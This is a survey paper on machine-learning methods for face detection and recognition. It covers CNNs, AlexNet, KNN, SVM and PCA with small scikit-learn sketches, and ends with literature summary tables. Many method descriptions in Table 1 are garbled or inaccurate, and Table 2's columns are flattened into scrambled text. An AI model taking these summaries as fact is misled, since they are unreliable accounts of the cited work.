(CONECCT) (pp. 1–5). IEEE.
A Survey: Approaches to Facial
Detection and Recognition with Machine
Learning Techniques

Prateek Singhal, Prabhat Kumar Srivastava, Arvind Kumar Tiwari,


and Ratnesh Kumar Shukla

Abstract The present scenario in biometrics makes facial recognition and authentication
very complex and challenging to classify. This article presents a detailed review of
machine learning, describing different databases and multiple approaches used to overcome
the issue of face identification and recognition. This paper offers a description of the
work of numerous researchers on the recognition of faces and identity, focusing on facial
detection and recognition methods in which minimally processed and unregulated faces from
individual photographs and videos are recognized and authenticated. The authors describe
several facial datasets, real-time pictures and videos, and discuss sophisticated
approaches for identification and recognition applications. The introduction of a machine
learning approach with multiple image datasets also increases the efficiency of the
classifier in predicting face detection and recognition-related content. In conclusion,
the authors elaborate the various machine learning and deep learning approaches related
to facial recognition and identification.

Keywords Facial control panel · Machine learning techniques · Deep learning


techniques · Biometric computer

1 Introduction

In the present situation, object identification and recognition is a very complex
and daunting topic in pattern processing, computer vision, neural networks, and
machine learning. This subject is being debated in numerous learning communities,

P. Singhal (B) · P. K. Srivastava


Babu Banarasi Das University, Lucknow, U.P, India
A. K. Tiwari
Kamal Nehru Institute of Technology, Sultanpur, U.P, India
e-mail: arvind@kiit.ac.in
R. K. Shukla
Dr. APJ Abdul Kalam Technical University, Lucknow, U.P, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 103
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_9

such as the supervised and unsupervised learning communities. Facial implementations
involve the recognition of 2D facial representations and the creation of different facial
descriptors using various learning strategies. Recent advances in deep learning have
opened a new path for researchers applying artificial intelligence to face detection and
recognition. Deep learning is a rapidly growing and very popular technique for face
detection and recognition; it has been designed to address dynamic machine learning
problems and works on both human- and machine-based problems. It is an innovative
theory- and technique-based method for identifying faces for recognition and verification.
In deep learning, the machine is the learner and executes the classification process
directly on new videos and pictures; it tackles state-of-the-art problems and improves on
the accuracy and efficiency of human beings. Deep learning trains on labeled data within a
neural network architecture that involves several layers in the convolutional neural
network, where hidden layers serve as a bridge between the input and output layers. These
networks work on both basic and complicated types of pictures, and identification and
authentication problems are solved by using the full set of layers contained in the hidden
part of the network. Deep learning and its theory were first introduced in the 1980s. For
the following reasons, it has become a powerful concept for feature extraction in face
detection and recognition.

1.1 Convolutional Neural Network

It builds on some of the best machine learning principles and has been used in pattern
recognition, computer vision, and machine learning. The convolutional neural network is
a strong method for evaluating past information or evidence to solve a given problem; it
relies on transforming the input image into the output image using several hidden layers,
and it is closely tied to machine learning and pattern analysis. In 1980, Kunihiko
Fukushima suggested the use of a neural network architecture to address the image
recognition problem, and studies have since been performed on the geometric patterns used
in image processing for facial identification and recognition. Researchers focusing on
the issue of image and video recognition and authentication have proposed many ideas to
solve the problem of facial identification and recognition. In the deep learning
approach, the term deep refers to the number of hidden layers (including max pooling
layers) found in the network: ordinary networks have two or three layers, whereas deep
networks can examine hundreds of layers. As deep learning has focused on facial
identification and recognition, higher accuracy has been achieved. Deep learning operates
much like a robot and draws on artificial intelligence; such networks learn their
functionality with the aid of feature extraction, in which the features are derived from
the hidden layers.
Figure 1 demonstrates the convolutional neural network architecture based on the
interaction between the input, output, and hidden layers. The architecture organizes a
collection of interconnected nodes into layers, some of which are known as hidden layers.

Fig. 1 Architecture of a CNN showing the relationship between input, output, and hidden layers

The characteristics of the input images are classified and compared with the stored
images. The hidden layers hold the largest number of layers for these applications and
identify the different attributes of both basic and complex pictures in the datasets.
Figure 1 represents the model architecture of the convolutional neural network as a
combination of the input, hidden, and output layers. These layers are the most important
components of the convolutional neural network, since they interpret all the features of
the input images, label them in the hidden layers according to their characteristics, and
organize the output for the input images.

2 Machine Learning Methods in Face Detection and Recognition Algorithms

Machine learning methods are applied to significant amounts of labeled data in datasets,
using the corresponding sequences of features that are present in the datasets without
manual feature extraction. A deep neural network is a combination of nonlinear
computation layers used in machine learning and pattern analysis; the layers are
interconnected, with an input layer for the input data, hidden layers for the features,
and an output layer for the object. Deep learning addresses the problem of faces in
real-time photographs and databases: it starts from the captured photos and normalizes
them across the network. Deep learning draws on the widest range of technologies to
enhance the efficiency of facial identification and recognition, solves face-related
problems using convolutional neural network architectures, and provides new ideas and
definitions for developing solutions to face-related problems in a real-time world.

2.1 Alex Net

AlexNet is a well-known deep learning model developed in 2012 by Alex Krizhevsky, Ilya
Sutskever and Geoffrey Hinton. It is a very popular and simple model for researchers
addressing the problem of face detection and recognition. It has a simple architecture
that merges convolutional layers with pooling layers; the deep neural network is a mix of
convolutional layers, multiple pooling layers and fully connected layers. The network
gathers a large amount of information from the data and stores it in the convolutional
network, including various types of hidden layers that act as subdivisions of the input
object. The deep neural network in Fig. 2 takes an input image and detects an entity or
assigns it to a group; the entity is then classified so that productive outputs are
obtained.
In Fig. 2, the input image comes from the test images in this network model; after
gathering the training data, the network model starts to recognize the basic features of
the object and associates the image with the corresponding categories.
In this deep convolutional neural network, each layer incorporates data or an image from
the previous layers and transfers it to the next layers, which increases the precision
and consistency of all the image data from layer to layer. The deep convolutional neural
network operates through various layers. The convolutional layer processes the input
image through a sequence of neural transformations, and this forward pass learns the
characteristics of the pictures. The pooling layer simplifies the output by performing
nonlinear down-sampling, reducing the number of measurements used for the features of the
images.
The fully connected layer plays its part in the identification of the object. After the
detection function of the deep convolutional network is complete, processing moves to the
next stage, the fully connected layers. These are the last layers of the deep
convolutional neural network and classify and define the categories of the entity. They
produce a k-dimensional vector, where k is the number of classes; the model predicts the
characteristics of the network, and these vectors contain the probabilities for each
class to be identified in each image.

Fig. 2 Deep CNN



2.2 Feed Forward Neural Network

The feed forward network is one of the most common deep learning models and works on the
facial features used in machine learning. It succeeds in characterizing the input layers
and does not use manual feature extraction, although it requires time to transfer the
information through the network; the features of the databases are resolved and
categorized. Figure 3 displays the architecture of the feed forward network model,
containing both weight and bias elements. Such networks often contain a three-layer
structure over which the neurons are allocated. The hidden layers shown in Fig. 3 are
identified in this model as h, together with the output layer and the bias units. Bias is
applied to the network model through weights whose input value is always 1, and the
output layers sum and convert the data. Three layers are found in the feed forward
network architecture of Fig. 3, and the correspondence between the layer collections
produces the final outcome. The input layer x1–xn is connected to the hidden layers
h1–hn, which in turn are connected to the output layers y1–yn; all are interconnected
through the weights and biases in the network model, with information flowing in the
forward direction. Computational sophistication depends on the number of hidden layers,
allowing high fidelity in network models, and the bias makes the handling of the input
and output layers more efficient.

Fig. 3 Architecture of feed forward network with weight and bias



2.3 Deep Convolution Neural Network

The deep convolutional neural network (DCNN) transmits information through a nonlinear
model built from a number of layers; it works on faces and supports machine learning
applications. The network delegates several hidden layers to the different face features
used, and these layers consist of neurons or nodes. The DCNN interprets a set of objects
and, after processing, immediately matches the face of an object to the corresponding
input images. The labeled data in a DCNN are the training data in the datasets; they are
used to recognize images and to place their attributes in specific groups of the
datasets. The DCNN passes data from the previous layers to the feature set in the next
layers of the architecture, increasing the consistency and precision of the features as
it works from layer to layer.

2.4 K-nearest Neighbors

The KNN algorithm is one of the better algorithms for matching the features of the
closest neighbors or nodes. It is often called a lazy algorithm, and k is the number of
nearest neighbors considered. The algorithm is easy to understand, and the stored
examples interact directly with each other. The k-nearest neighbor algorithm is based on
the features of the closest object nodes and is a non-parametric algorithm: the term
non-parametric means that it makes no assumptions about the underlying distribution of
the data. It truly uses a storage (memory-based) method, so the full feature data do not
fall within the traditional theoretical study of a learned function. The KNN algorithm
chooses the closest points in the feature space of the database; these depend on a
minimum distance over, possibly, multi-dimensional vectors, since the feature space
carries a notion of distance. A non-parametric algorithm such as the k-nearest neighbor
algorithm is therefore well suited to solving this problem on the databases.
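A small sketch of this nearest-neighbor matching, assuming scikit-learn and flattened face images treated as plain feature vectors (the synthetic gallery, the Euclidean metric and k = 3 are illustrative choices):

import numpy as np
from sklearn.neighbors import KNeighborsClassifier

rng = np.random.default_rng(0)
bases = rng.random((10, 64 * 64))                        # one stand-in "face" per identity
gallery = np.repeat(bases, 3, axis=0) + 0.01 * rng.random((30, 64 * 64))
labels = np.repeat(np.arange(10), 3)                     # 10 identities, 3 images each

knn = KNeighborsClassifier(n_neighbors=3, metric='euclidean')
knn.fit(gallery, labels)                                 # lazy learning: the gallery is simply stored

probe = bases[1] + 0.01 * rng.random(64 * 64)            # a slightly perturbed face of identity 1
print(knn.predict([probe]))                              # -> [1]; its 3 nearest neighbors share identity 1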

2.5 Support Vector Machine

The support vector machine is a very efficient and effective classifier used in machine
learning. In a support vector machine classifier, the margin between the data points and
the decision surface for face detection and recognition must be maximized. The classifier
selects the points nearest to the decision surface and then measures their distance from
it; these closest points are known as the support vectors, and their use in the machine
gives the method its name. The SVM maximizes the width of the margin, i.e., the distance
to the nearest points, and compares their characteristics from one point to another.
Once this process has been completed, the faces in the databases are recognized.
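A brief scikit-learn sketch of these ideas, using synthetic two-dimensional feature vectors as stand-ins for face features (all data and parameter choices here are illustrative):

import numpy as np
from sklearn.svm import SVC

rng = np.random.default_rng(0)
# Two toy classes of feature vectors (e.g., features from two different people).
X = np.vstack([rng.normal(0.0, 1.0, (20, 2)), rng.normal(4.0, 1.0, (20, 2))])
y = np.array([0] * 20 + [1] * 20)

svm = SVC(kernel='linear').fit(X, y)       # maximum-margin linear decision surface
print(svm.support_vectors_.shape)          # the points closest to the decision surface
print(svm.decision_function(X[:3]))        # signed (scaled) distances from the surface
print(svm.predict([[2.0, 2.0]]))           # which side of the surface a new point falls on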

2.6 Principal Component Analysis

Principal component analysis is one of the most common and oldest techniques in image
processing and pattern analysis. It was developed by Pearson (1901) and improved by
Hotelling (1933). It works on the eigenvalues and eigenvectors obtained using matrix
methods and has been used in a wide variety of applications. The purpose of PCA is to
reduce the dimensionality of the data; it can handle a huge range of datasets, and the
extracted components remain linked to the remaining information available in the
databases of the scheme.
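The dimensionality-reduction step can be sketched with scikit-learn as follows (the random stand-in data and the choice of 20 components are illustrative; on real face images the components are the classic eigenfaces):

import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
faces = rng.random((100, 64 * 64))       # stand-in for 100 flattened face images

pca = PCA(n_components=20)               # keep the 20 leading principal components
coeffs = pca.fit_transform(faces)        # each face becomes a 20-dimensional vector

print(coeffs.shape)                                   # (100, 20): reduced representation
print(pca.components_.shape)                          # (20, 4096): the eigenvectors ("eigenfaces")
print(round(pca.explained_variance_ratio_.sum(), 3))  # fraction of variance retained

# A face can be approximately reconstructed from its low-dimensional coefficients.
print(pca.inverse_transform(coeffs[:1]).shape)        # (1, 4096)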

2.7 Linear Discriminant Analysis

This approach is similar to Fisher's discriminant analysis. It has been used to identify
images, including their local features, which take the form of pixel values and are
categorized as shape features, texture features, and color features. It defines the
features to be used for linear vector separation and also uses similar features within
the picture. These methods are used to maximize the between-class scatter and minimize
the intra-class variation in face identification and recognition.

3 Feature Extraction

Feature extraction is a very common method used to extract features from images for
facial identification and recognition. It is widely used in a number of fields, such as
optical image recognition, pattern detection, machine vision, and deep learning. The
input materials or pictures are converted into pixels, and these pixel values are turned
into a combination of features in a database, since the chosen features provide the most
relevant details of the original data. It is also useful for biometric applications and
machine learning.

3.1 Geometric-Based Methods in Feature Extraction

Geometric feature-based methods measure a series of facial landmarks, such as the lips,
eyes, ears, and nose. In this geometric representation, the locations of the eyes, mouth,
ears, and nose form a type of feature vector. They are reliable for automated extraction
and are critical for the detection and recognition of the face. Geometric features
reflect the shape, position, and color of facial components, isolating feature attributes
for facial detection and facial recognition.

3.2 Holistic-Based Methods in Feature Extraction

Holistic methods are among the most effective tools for facial identification and
recognition; they use software classification approaches for face detection and
recognition. Unlike local extraction processes, holistic feature extraction treats the
whole image as the source of information, eliminating the usual processing that defines
local regions and instead deriving broad data from the images in the database. Holistic
feature extraction transforms the image into a low-dimensional feature space, which
increases the discriminant capacity of the images.

4 Related Work of Machine Learning Approaches in Face Detection and Recognition

Machine learning methods have been suggested in literature reviews performed by
different scholars, who have identified and adopted many methods and strategies
for the identification of faces.

5 Summary Sheet of Machine Learning Approaches for Face Detection and Face Recognition

Table 1 provides an overview of machine learning approaches to facial detection and
identification in images and videos. It shows facial identification and recognition
approaches using different strategies and datasets, together with their accuracy, and it
further illustrates the merits and demerits of each approach, with the various authors
using their own image definitions for datasets that have proven to be related. The table
covers a variety of distinct strategies and approaches that various researchers have used
to obtain the best facial identification and recognition results, and it also classifies
the methods used in facial detection and identification. The table description provides a
full overview of the approaches that address the problems of faces in various settings,
attempting to solve the new face detection and identification issues found in the
existing scenario (Table 2).

6 Machine Learning Methods Perception and Suggestion in Face Detection and Recognition

Face detection and recognition applications work on 2D face images and need a large
number of feature matches across different techniques. Using learning applications, the
accuracy on face images in datasets has been improved. The impact factor of pose,
illumination, and expression is the basic and complete information

Table 1 Brief description of literature


Year Description
2018 Ming Shao et.al. Sparse many-to-one encoder (SMF) and collective random faces (RFs).
They focused on presenting the invariant representation of the face and identifying the
faces. Author works on separate paper using MultiPIE pose datasets, You Tube datasets
(YTF), and real-world datasets. They increased efficiency from 7 to 14% in face detection
and recognition [1]
Chung-Chi Tsai et.al. introduced an unsupervised learning system and a general
optimization method. This procedure enhances the co-segmentation mask to enhance the
co-salience characteristics. Unsupervised learning and collaborative optimization method
examines the principle of objectivity and saliency in various types of multiple images or
datasets Cosal2015, iCoseg, image pair, and MSRC datasets have high-quality outcomes
for both co-salinity and co-segmentation [2]
Zhe Hu et.al. proposed a method of non-blind deconvolution to eliminate ringing
artefacts through light for facial detection and recognition. The non-blind deconvolution
process senses light stretches for distorted images and integrates them into the optimized
facial identification and recognition framework. The author has focused on png and jpeg
images using a low-light environment [3]
Saeed Anwar et.al. suggested the treatment of class-related problems and class genetic
blind deconvolution. This proposed method has been used to overcome the limitation of
the existing method when faced with blurred image that lacks a high frequency. This
focuses mainly on blurred images representing a single object and class-specific testing
using CMU-PIE, CAR, FTHZ and INRIA datasets [4]
Xiang Wang et al. proposed to use RegionNET or RexNet and salient object detection
techniques to solve the problem of facial detection and recognition. RexNet has provided
saliency mapping for VGG, ImageNet, ContexNet, ECSSD, DOTOMRON, and
RGBD1000 datasets from end to end. RexNet has focused on the identification and
multi-scale computational robustness strategy for facial detection and recognition [5]
Weihong Deng et.al. (2018) suggested a binarization filtering model and a spatial
histogram for facial detection and recognition. The author has created a scatter
compressive binary pattern (SCBP) descriptor to enhance the accuracy of the face picture.
SCBP uses 6RF own handcrafted filters to achieve accurate and robust performance. CBP
is also used to increase the robustness of LBP. In this article, the authors used DFD and
CBFD for derived noise sensitive filtering adapted to the fine grained structure of the
FERET, LPW, and PASCAL databases for face detection and recognition [6]
Koteswar Rao et.al. (2018) co-saliency prediction techniques have been used in various
facial identification and recognition datasets. Co-saliency estimation method using basic
scale estimation technique as shown on large-scale ImageNet, MSRC, iCoseg, and
Coseg-Rep datasets. This method solves a map dilemma with a well-separated
background and foreground. This system is capable of delivering very successful results
[7]
Sergey Tulyakov et.al. (2018) suggested a forest regression algorithm to diagnose the
problem of facial identification and recognition. They also solved the problem in a
coherent and effective way. They are stable in 3D face rotation of MultiPIE, HBPD,
BU-4DFE, and MultiPIE-VC datasets. This methods are used to find accurate calculation
of face position and accuracy of perspectives on various dimensions. This approach
achieves highly competitive results on a variety of benchmarks [8]
Xuanyi Dong et.al. (2018) suggested multi-model and self-paced learning algorithms for
detection (MSPLD) and few example object detection (FEOD) for face detection and
recognition. These models have used a large number of unidentified picture pools and a
few named images per group. They use various detection frameworks for discriminant
information. This approach provides stronger performance in PASCAL-VOC2007,
PASCAL-VOC2012, MSCOCO2014, ILSURC2013, and ImageNet-COCO datasets [9]
Mehdi Mafi et.al. (2018) introduced a switching-based adaptive median and fixed-based
weighted mean filter (SAMFWMF) for facial detection and recognition. Same edge
detection and sharpening have been regulated by SAMFWMF in Lena (5,128,512),
Cameraman (250 × 250), Coins (300 × 246), and Checkboard (256 × 256) pictures.
SAMFWMF achieves better systemic metrics. They are best resolved by entering into a
contract with another traditional thresholding tool to detect faces and then identify them
[10]
Dapeng Tao et al. (2018) suggested a model of the tensor rank preservation discriminant
analysis (TRPDA) technique to solve the issue of facial identification and recognition.
They achieved robust results and generated high rates in UMIST, ORL, and
CAS-PEAL-R1 datasets. TRPDA has extracted the knowledge rating and exclusion
function. They are a flexible way of studying the face for identification and recognition
[11]
Wei Wang et al. (2018) introduced recurrent face aging (RFA) and RNN for facial
diagnosis and identification. RFA improved 65.43% and the accuracy of the bilayer
increased 61%. It indicates that RFA performs marginally better than the RNN bilayer.
The author uses LFW and CACD datasets to enhance face detection and recognition
performance. RFA system consists of triple layer GRU, providing improved output of
identity information in the GRU bilayer for facial detection and recognition [12]
Seunghwa Jeong et.al. (2018) Markov has used random field energy modeling. In
specific, this approach functions as a large baseline multi-view system. This segmentation
approach increased efficiency with a comparable consistency. This has been created in the
latest state-of-the-art design. They also collected functionality in different critical
conditions. They provided the full number of rotations, views, and distances between the
cameras captured. A sparsely defined baseline has been collected quite efficiently [13]
Christos Sagonas et.al. (2018) suggested joint and human variation clarified (JIVF) and
robust-JIVE (RJPVE) for facial identification and recognition. They have increased the
quality of the ears. Details on the faces remaining in the RJIVE-based progression of
FG-NET datasets were also defined. Accuracy depends on the pair of photographs
compared to the age difference [14]
Xiangyu Zhu et.al. (2018) based on 3D complex alignment (3DDFA) and 3D Morphable
Interface (3DMM) for facial identification and recognition. Face balance included the
entire posing spectrum. It has achieved variance in the face orientation of the ALFW,
AFW, LFPW, HELEN, IBUG, 300 W, and AFLW 2003D datasets. Comparing the output
of the drop is substituting boundary poses. This approach shows the highest robustness of
initialization of 3DDFA in face identification and recognition [15]
Mei Wang et al. (2018) have adapted it to a variety of different strategies. This was used in
the identification and recognition of the face [16]
Changxing Ding et.al. (2018) suggested controlled face function (CPF) for facial
identification and recognition. Using CPF in large-scale studies reveals dominance in
both learning representation and spinning frontal images. The face recognition
experiment in the MultiPIE database offers further information that shows the role of
intensity in particular methods [17]
C. Fabian Benitez-Quiroz et.al. (2018) introduced a facial control device for the
identification and recognition of the face. The facial action device has been developed
to address the issue of recognition using robust machine vision algorithms. These
datasets are used for color functionality by DISFA and AM-FED. This color can also
be used to identify the triggering of the action unit [18]
Cristóvao Cruz et.al. (2018) suggested a single image super resolution (SISR) and CNN
for facial identification and recognition. 1D Wiener filtering operates on similarity
domains, which gives an appropriate solution to the particular issue of SISR. The results
are sharper reconstructions on the SET5, SET14 and urban datasets. This approach works
well only on pictures with significant self-similarity [19]
2017 Xiaolong Wang et.al. (2017) have suggested a cross-age face authentication algorithm for
facial detection and recognition problems. They also focused comparatively on an
successful compromise between the share of features and the omission of features [20]
Chi Nhan Duong et.al. (2017) suggested a temporary non-volume preservation (TNVP)
and generative adversarial network (GAN) for facial identification and recognition using
FG-NET, MORPH, CACD, and AGFW datasets. TNVP measured both the synthesizing
of advanced age faces and the cross-face testing period with accuracy. TNPV has
promised an appealing density property. They collected information on features and
inferred the importance of successive phases of the face in the assessment of embedded
datasets [21]
Ran He et.al. (2017) suggested infrared visual verses (VSS-NIR) and invariant deep
representation (IDR) using CASIA, NIR-VIS2.0, and broad scale VIS datasets for facial
identification and recognition. In large-scale VIS results, they achieve 94% of the
verification rate compared to the state of the art. This lowers the error rate by 58% only
for a lightweight 64D representation [22]
Hu et al. (2017) suggested a learning displacement field network (LDF-NET) system for
facial identification and recognition using MultiPIE datasets. It operates toward the
frontal view, which offers insightful information from the datasets.
LDF-NET has achieved increased facial identification and recognition efficiency around
the face [23]
Christain Galea et.al. (2017) focused on the deep convolution neural network (DCNN)
approach to understand facial detection and identification using VGG facial, PRIP HDC,
MEDS II, FRGCV2.0, and MultiPIE. The error rate was lowered from 80.7 to 32.5% by
the use of forensic real-world drawings. The Morphable model has been used to alter
faces from facial features and automatically produces close images [24]
Rajeev Ranjan et.al. (2017) suggested a single deep convolution neural network
(SDCNN) and multitask winning system (MTL) to be used for face detection and
recognition. Ses findings demonstrate the perception of the faces of the networks and the
change, Celeb-A, IMDB + WIKI, and PASCAL datasets obtained. This approach has
been greatly changed. The HyperFace structure of the MLT has been strengthened [25]
2016 Yadong Guo et.al. (2016) using the MS-Celeb-1 M, YFW, FG-NET, CASIA, Facebook,
and Google benchmark facial identification and recognition tasks. That training range
includes approximately 75% of celebrities. Face identification requires human actions in
the processing of pictures. Benchmark’s method has worked on very large datasets.
Classification methods have been used to solve the issue of faces in actual applications
[26]
Wen-Sheng Chu et al. (2016) suggested automated facial action unit (AU) detection with a selective
transfer machine (STM) for facial identification and recognition using the CK+,
GEMEP-FERA, RU-FACS, and GFT datasets. The experimental outcomes
showed both AU-level and holistic-expression implications. STM is able to enhance
test performance by selecting training samples closest to the test samples. STM can be
formulated with convex decision and logistic loss expressions [27]
George Trigeorgis et al. (2016) suggested a semi-non-negative matrix factorization
algorithm for facial detection and identification. They used the CMU-PIE and XM2VTS
databases for facial identification and recognition and worked on
two-dimensional representations to understand the expressions. The algorithm addressed both clustering
and classification problems and allows different attribute information to be combined
from different data sources [28]
Iacopo Masi et al. (2016) suggested pose-aware models (PAM) using the IARPA, LFW,
CASIA, YTF, IJB-A, and PIPA datasets to solve the facial identification and recognition problem.
These models provide a solution at the optimization stage and mitigate the lack of pose
regularization. All model selection functions operate on a pipeline of recognition
models [29]
Zhifeng Li et al. (2016) developed a hierarchical system with two levels of learning
using local pattern selection (LPS). The accuracy exceeded
94.20% on separate datasets such as MORPH, FG-NET, and Album2,
with the clearest results on MORPH and Album2. The improved
performance, however, is largely limited to aging faces [30]
Mehdipour Ghazi et al. (2016) combined CNNs with the VGG framework to boost the
performance of facial identification and recognition using deep learning
models. They offered an effective representation for face identification and
recognition, focusing on a comprehensive, representation-based evaluation,
and obtained better outcomes under varying conditions [31]
Ju Yong Chang (2016) suggested a gesture recognition system based on a
structural support vector machine (SSVM) and a conditional random field (CRF), applied to
facial identification and recognition. An efficient gesture recognition
tool was developed for real gesture datasets. The CRF model uses nonparametric
feature matching with different feature functions. The LAP and
MSRC-12 datasets were used to train the SSVM-based learning system [32]
Bastian Wandt et al. (2016) suggested previously trained base poses and predefined
skeletal anthropometric constraints for reconstructing 3D human motion from a
monocular image sequence. The model uses periodic functions for the weights of the
base poses, which proved effective and stable for periodic motion. The suggested
system was evaluated on the KTH datasets as well as an outdoor obstacle jump
sequence [33]
Pan Zhou et al. (2016) introduced latent low-rank representation (LatLRR) with PCA for
facial identification and recognition. The suggested approach obtains better classification
outcomes than other representation-based paradigms and state-of-the-art identification
methods, even with a simple linear classifier. It was applied to a huge collection of datasets
(YALEB, AR, Pe, and UCFF-50) by implementing L1-filtering algorithms. This approach
also compares favorably with other systems [34]
Chunlei Peng et al. (2016) suggested a multiple-representations-based face sketch-photo
synthesis (MrFSPS) technique with a Markov model for face detection and recognition. The process
builds on existing synthesis methods. Improved face recognition results have
been obtained, boosting the image quality on the CUHK, FERET, IIT-D, FG-NET, and LFW
datasets. These datasets were evaluated against various synthesis models, which were
used to synthesize face images for recognition with positive results [35]
Chao Dong et al. (2016) introduced a deep CNN for single-image super-resolution (SRCNN), also applicable to
facial identification and recognition. SRCNN learns an end-to-end mapping
between low- and high-resolution images and is optimized with little separate
pre-processing or post-processing [36]
2015 Jiwen Lu et al. (2015) suggested a compact binary face descriptor (CBFD), pixel difference vectors
(PDVs), and a coupled CBFD (C-CBFD) scheme for facial identification and recognition.
CBFD minimized the modality gap for heterogeneous face matching on the FERET,
CAS-PEAL, LFW, PaSC, CASIA, and NIR-VIS 2.0 databases. Successful outcomes were
obtained on object recognition and face detection, providing further
proof of the usefulness of the features [37]
Huazhu Fu et al. (2015) suggested a multi-state selection graph (MSG) system for face
identification and recognition. It incorporates an indicator function for the proper treatment of
cases and can recover missing foreground objects in some videos. MSG provides a
general, shared framework to enhance the outcome, extending standard graph models
for images. It operates on multiple state collections of
features in pictures and allows optimization with existing energy minimization
techniques [38]
Changxing Ding et al. (2015) introduced multitask feature transformation learning
(MTFTL) and a patch-based partial representation (PBPR) for face detection and
recognition, operating on training images from the FERET, CMU-PIE, MultiPIE, and
LFW databases. The new solution improves considerably on existing systems and
addresses the verification and recognition of unconstrained faces, with optimal
results found on the LFW dataset [39]
2014 Javier Galbally et al. (2014) suggested an image-quality-based approach to the issue of fake
photos in face identification and recognition. It works reliably at a
high level against various forms of biometric attacks. The authors also opened
new possibilities for future work, including the assessment, inclusion, and use
of video quality measures [40]
Zhen Lei et al. (2014) proposed a Gabor- and local-binary-pattern-based discriminant face
descriptor (DFD) and a coupled DFD (C-DFD) for facial identification
and recognition. The coupled image feature distance between heterogeneous faces is
minimized using learned filters. DFD was tested and provides improved
performance on small datasets such as FERET, LFW, CAS-PEAL-R1, and HFB. It
shows good generalization and yields a competitive
descriptor for face recognition under different conditions [41]
2013 Yizhe Zhang et al. (2013) introduced a high-level feature learning scheme for facial
identification and recognition. The approach addresses many-to-one high-level face
feature learning and extracts pose-invariant, discriminative identity features on the
CMU-PIE and MultiPIE databases [42]
Shuiwang Ji et al. (2013) used CNN and 3D CNN models for identification and recognition.
3D convolutions provide improved efficiency in extracting spatial and
temporal information, encoding motion information across several neighboring
frames; experiments were performed on the KTH and TRECVID databases. The 3D CNN
model is superior on the TRECVID data and competitive on the KTH
database [43]

about the face images. Face identification and authentication of unknown individuals
are very critical factors. A moving target is a very difficult case in face recogni-
tion, and further challenges arise from the subject's aging and non-rigid motion.
Learning discriminative appearances for face representation relies on pose-invariant
face recognition. Face detection is a major concern in facial recognition systems.
The challenge lies in recognizing faces across varying poses by contrasting the
information in the probe face image with the images of the
enrolled face.
3D face detection and recognition algorithms work well under pose variation, expression,
and lighting changes, and also for low-light images. In an open and unconstrained setting, the
variation of these factors increases with illumination and expression. Pre-processing is the
fundamental and essential stage in image processing, and post-processing
is used to refine the images. Post-processing techniques extract the characteristics present
in the face, such as skin color, eye color, nose height, and related
attributes. In feature extraction learning, various methods are used to
quantify the features used in face detection and recognition.
In face identification and recognition, the guided encoder employs collaborative
random faces (RFs) to relate the facial appearance of the test faces to
the enrolled faces [1]. The random functions fit the face patterns stored in the database.
The attributes of the faces and their degree of conformity are handled and
investigated through discriminative identification functions, such as size, skin tone,
and pose. A typical feature-alignment analysis covers the facial features
across numerous poses using either deterministic or nonlinear deterministic
transfer functions. In a typical setting, face recognition images may share the same pose,
lighting, and extracted values but carry different identity labels. It means they have
Table 2 Description of techniques, merit and demerits


Technique Result Merit Demerit
Collaborative random SME and RF model are RF model is work on pose RF and SME do
faces(CRF) and sparse improving 7% on variant faces. SME work not give positive
many-to-one encoder MultiPIE and 14% You on comparing multiple result on
(SME) [1] Tube database(YTF) image to single image constraint poses
Unsupervised learning This technique has This method has worked The object
and and joint optimization exploring the concept of on publically using segmentation
framework has improved saliency and objectness in datasets. These techniques iteratively work
the performance of different type of multiple have provided out the
co-segmentation. They images or datasets high-quality result on both region-wise.
have also improved co-saliency and Adaptive saliency
co-saliency priors [2, 7] co-segmentation map fusion has
transfer useful
information to
different task
Non-blind deconvolution This algorithm has This method has detecting Non-blind
scheme has to suppress to performed favorably light stretches in blurry deconvolution
the ringing artifacts against state-of-art images. And incorporates method has not
covered by the light [3, 4] deblurring for low-light them into an optimization generated
images frame works satisfactory results
in present of
drastic loss of
information
CNN, R-CNN, RexNet is providing RexNet has achieved clear RexNet is based
RegionNET OR RexNET, saliency mapping between detection boundary. And it on the
salient object detection [5] end to end with sharp has also achieved segmentation of
object boundaries multi-scale conceptual images
robustness
Image filtering SCBP descriptor is CBP is improving the The major issue
binarization and spatial handcraft by 6RF Eigen robustness of LBP. DFD has solved by an
histogram, Scattering filters. They are sufficient and CBFD are derived optimized
Compressive Binary to achieve accurate and noise sensitive filtering descriptors. That
Pattern (SCBP) [6] robust performance adapting to fine grained has combined
structure distinctiveness,
robustness, and
compactness
Regression forest-based This has improved They have found effective This method has
algorithms [8] consistency and result in consecutively performs highly
computationally in multiple related features competitive
efficient manner. Those in head pose and relative accuracy. That has
have found robust result in approaches score on a range
3D face rotation of benchmarks
Multi-model self-paced Object detection has used It has used discriminative They have not
learning for detection large-scale unlabeled knowledge to solve the detected every
(MSPLD), few example image. But also used few problem of images using complicated
object detection (FEOD) labeled image in some for different image image in datasets
[9] category detection model
Switching adaptive The similarity of edges SAMFWMF is performed They have
median and fixed has adopted the properties better structural metrics. provided better
weighted mean filter using median filters. They They have provided good result in high
(SAMFWMF) [10] have provided better result result in contrast using intensity impulse
in sharpness and common method of noise with edges
smoothness property in thresholding
edges
Tensor rank preserving TRPDA has provided They have extracted They have worked
discriminant highest recognition rates extract feature with the on two order
analysis(TRPDA) [11] and better performance rank module. They have tensor. They have
unstable manifold included with an
learning methods arrow and column
Recurrent face aging The accuracy has shown The triple layer RFA RFA framework
(RFA) RNN [12] that RFA is worked better framework GRU gives the does not work on
than RNN, because they better identity information integrate the age
have performed than bi layer GRU estimation
65.43–61.00%
Markov random field This method has They have captured These systems are
energy optimization [13] especially based on wide images in various using sensitive
baseline multi-view conditions. They have camera parameters
environment worked very smoothly and
efficiently
Joint and individual They have improving They have improved They have
variance explained accuracy and validate the accuracy when the produced the
(JPVE), robust-JIVE identity of information differences of each pairs problem of age in
(RJIVE) [14] are maximum invariant face and
becomes more
difficult to
differences in
faces
3D dense face alignment Face alignment has This method has replaced They have
(3DDFA) and 3D worked on pose range and the boundary boxes using produced large
Morphable model also worked on 3D 3DDFA artifacts and
(3DMM) [15] Morphable model invisible region
filling
controlled face feature These methods have Face recognition Auxiliary subtask
(CPF) [16, 17] worked on superiority in experiment on MultiPIE under an
both learning database provide more unsupervised way
representation and rotating evidence and strength is universal to all
non frontal images datasets
registered the same images under different identities, so determining the true identity behind
an image is a major challenge. Feature learning in this scenario plays a significant
